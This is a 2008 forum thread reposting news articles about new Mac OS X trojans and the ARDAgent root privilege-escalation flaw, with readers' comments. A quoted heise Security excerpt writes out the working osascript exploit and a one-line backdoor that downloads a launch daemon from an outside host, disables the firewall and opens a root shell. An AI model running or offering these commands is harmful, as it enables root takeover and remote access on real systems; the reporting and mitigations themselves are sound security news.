Posted on 06/20/2008 10:10:44 PM PDT by Swordmaker
Security researchers are warning users of a crop of new malware threats that have appeared for the MacOS in recent days.
The outbreak includes two Trojan applications and a publically disclosed remote code execution vulnerability.
Security firm Intego, which last fall uncovered the Mac 'DNS Changer' trojan, told vnunet.com that it had discovered a new malware threat posing as a poker game.
According to Intego, when the user attempts to launch the application, simply titled 'PokerGame', a dialog box appears asking for the machine's administrator password. When the password is entered, the application executes a script that logs the user's name, password, and IP address, then uploads the stolen data to a remote server.
An attacker would then have the ability to remotely access and control the system, says Intego.
Separately, Intego disclosed a vulnerability in OS X's Remote Management agent which could allow an attacker to remotely execute code with the privileges of the current user. A spokesperson told vnunet.com that the issue has been reported to Apple and no attacks in the wild have been reported as yet.
Meanwhile, fellow security vendor SecureMac reported another OS X trojan. The attack is distributed either an AppleScript known as ASthtv05, or bundled as an application under the AStht_v06. When executed, the script will allow an attacker to remotely access the user's iSight camera, log keystokes, retrieve screen shots and manipulate file sharing settings.
The reports mark the first new malware threats for the MacOS since last fall when a DNS changer trojan was spotted posing as a video codec. Security has long been a top selling point for Apple, as Mac malware has been seen as virtually nonexistent in comparison to the hundreds of thousands of malicious apps currently threatening Windows.
In addition to their own security software, both Intego and SecureMac recommend that users follow best practices of not opening unsolicited or suspicious files.
"In addition to their own security software, both Intego and SecureMac . . ."
Beware Geeks bearing products for sale...
Both use social engineering and require the complicity of the users.
There is also a potential remote exploit that has not been seen in the wild that would allow rooting the Mac, according to the people reporting it.
If you want on or off the Mac Ping List, Freepmail me.
Hope they fix it.
by Jonny Evans
Posted in MacWorld UK
SecureMac and Intego are separately reporting the existence of a new security threat for Mac, claiming the existence of multiple variants of a new Trojan horse in the wild that affects Mac OS X 10.4 and 10.5.
The Trojan horse is currently being distributed from a hacker website, where discussion has taken place on distributing the Trojan horse through iChat and Limewire.
The Trojan horse runs hidden on the system, and allows a malicious user complete remote access to the system, can reportedly transmit system and user passwords, and can avoid detection by opening ports in the firewall and turning off system logging.
Additionally, the AppleScript.THT Trojan horse can log keystrokes, take pictures with the built-in Apple iSight camera, take screenshots, and turn on file sharing. The Trojan horse exploits a recently discovered vulnerability with the Apple Remote Desktop Agent, which allows it to run as root.
The Trojan is distributed as either a compiled AppleScript, called ASthtv05 (60 KB in size), or as an application bundle called AStht_v06 (3.1 MB in size). The user must download and open the Trojan horse in order to become infected. Once the Trojan horse is running, it will move itself into the /Library/Caches/ folder, and add itself to the System Login Items.
In response, SecureMac and Intego have both issued updated virus definitions to their security software applications for Mac, MacScan 2.5.2 and Intego VirusBarrier X5.
Guess I'm more of an astronomy geek than a computer geek.
There will always be a new upcoming audience for the scare mongers. And suckers every minutes for social engineering...
"Hi, I'm a poker game! Type your administrator password!"
Social engineering exploits vulnerability in PEOPLE.
I'll wait for the trojans that auto-install in spite of the operating system, before I declare my Macs to be dangerously vulnerable at the OS level.
ping to comment #8, per #4.
OS X flaw exposes Leopards and Tigers
8:39AM, Friday 20th June 2008
Security firm Intego has discovered a critical security vulnerability in Leopard and Tiger which could enable programs to run with full, root access to the system.
Fortunately, it Intego says that security hole is easily closed by simply enabling Remote Management in the Sharing preferences. Once this setting is activated, any exploit will not function.
The vulnerability takes advantage of the fact that Remote Management's ARDAgent component is owned by root, so running code via the ARDAgent executable runs this code as root, without requiring a password. The exploit in question depends on ARDAgent's ability to run AppleScripts, which may, in turn, include shell script commands.
SecureMac is reporting that it has already discovered both an AppleScript and and an application that attempt to exploit the flaw: a compiled 60KB AppleScript called ASthtv05 and a 3.1MB application bundle called AStht_v06. The user must download and open either in order to become infected, whereupon the malware moves itself into the /Library/Caches/ folder and adds itself to the System Login Items.
It the runs hidden on the system and can transmit system and user passwords and allow a malicious user complete remote access to the system. It attempts to avoid detection by opening ports in the firewall and turning off system logging. Additionally, the AppleScript.THT Trojan can log keystrokes, take pictures with the built-in Apple iSight camera, take screenshots, and turn on file sharing.
Simon Aughton
Don’t they mean that you should *disable* the function?
Also, RM is turned off by default in a Leopard install.
It appears that these may be more "proof-of-concept" trojansbased on the ARDagent vulnerability than actual in-the-wild threats.
Defeating the possibility of infection appears to be easy.
Nope... It seems that it must be enabled for it to be non-modifiable.
Activating Remote Management, moving the location of ARDAgent, compressing it in a ZIP file, deleting the User ID for ARDAgent, are appatently all cures for this particular vulnerability.
One participant said yesterday:
"well I suppose I should write my own little trojan so I can get famous too! Famous... I don't even think 100 sites have this posted. No one has received recognition from outside sources, the most I heard was "bunch of kids." No one released it so the press will die off in a couple of days. So in summary no ones famous, but if you guys want to release a worm/trojan/whatever and get busted go ahead."<> It looks to me as if this is another flash-in-the-pan attempt at exploiting an announced vulnerability without a means of vectoring it besides psychological engineering (Convincing stupid users to download it and run it). At this point, the "Trojan" exists only as an Applescript on some hacker sites, with no attempt at releasing it.
20 June 2008, 11:58
Root exploit for Mac OS X A vulnerability in Mac OS X 10.4 and 10.5 makes it easy for potential attackers to obtain root rights to a system. The ARDAgent Apple Remote Desktop part of Remote Management has the SUID bit set. ARDAgent is able to run AppleScript with root rights and these, in turn, may contain shell commands all without requiring a password.
To demonstrate the problem as a standard user or guest on a computer, type osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; into the console. Physical access to a system is not required for an attack to be successful. In principle, the exploit will also work remotely, say on a server on which a user has a restricted account with SSH access.
A suggestion of how this could be exploited to implement a backdoor has already been posted on Slashdot. When tested at heise Security, the line:
osascript -e 'tell app "ARDAgent" to do shell script "cd /System/Library/LaunchDaemons ; curl -o bash.plist http://cdslash.net/temp/bash.plist [cdslash.net] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start com.apple.bash ; ipfw disable firewall; launchctl "'
opened a root shell at TCP port 9999.
Several ways to solve the problem have now been suggested. The exploit doesn't work if the "Remote Management" option is enabled under Mac OS X 10.5 "System Settings/Sharing/" but this is not the default setting. Neither does it work if the Apple Remote Desktop client has been installed and enabled under Mac OS X 10.4. Other suggestions are to completely remove the Apple Remote Desktop, to compress the file, or to delete the SUID bit in ARDAgent
chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAg ent.
This one must have wandered away from the herd....
It’s always wise to be cautious.
Bears repeating, but there are plenty of rabid people who won't.
OMG that is so funny! You have a very sick mind...
Love it.
So is this actually in the wild infecting people, or is this just FUD to push product?
Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.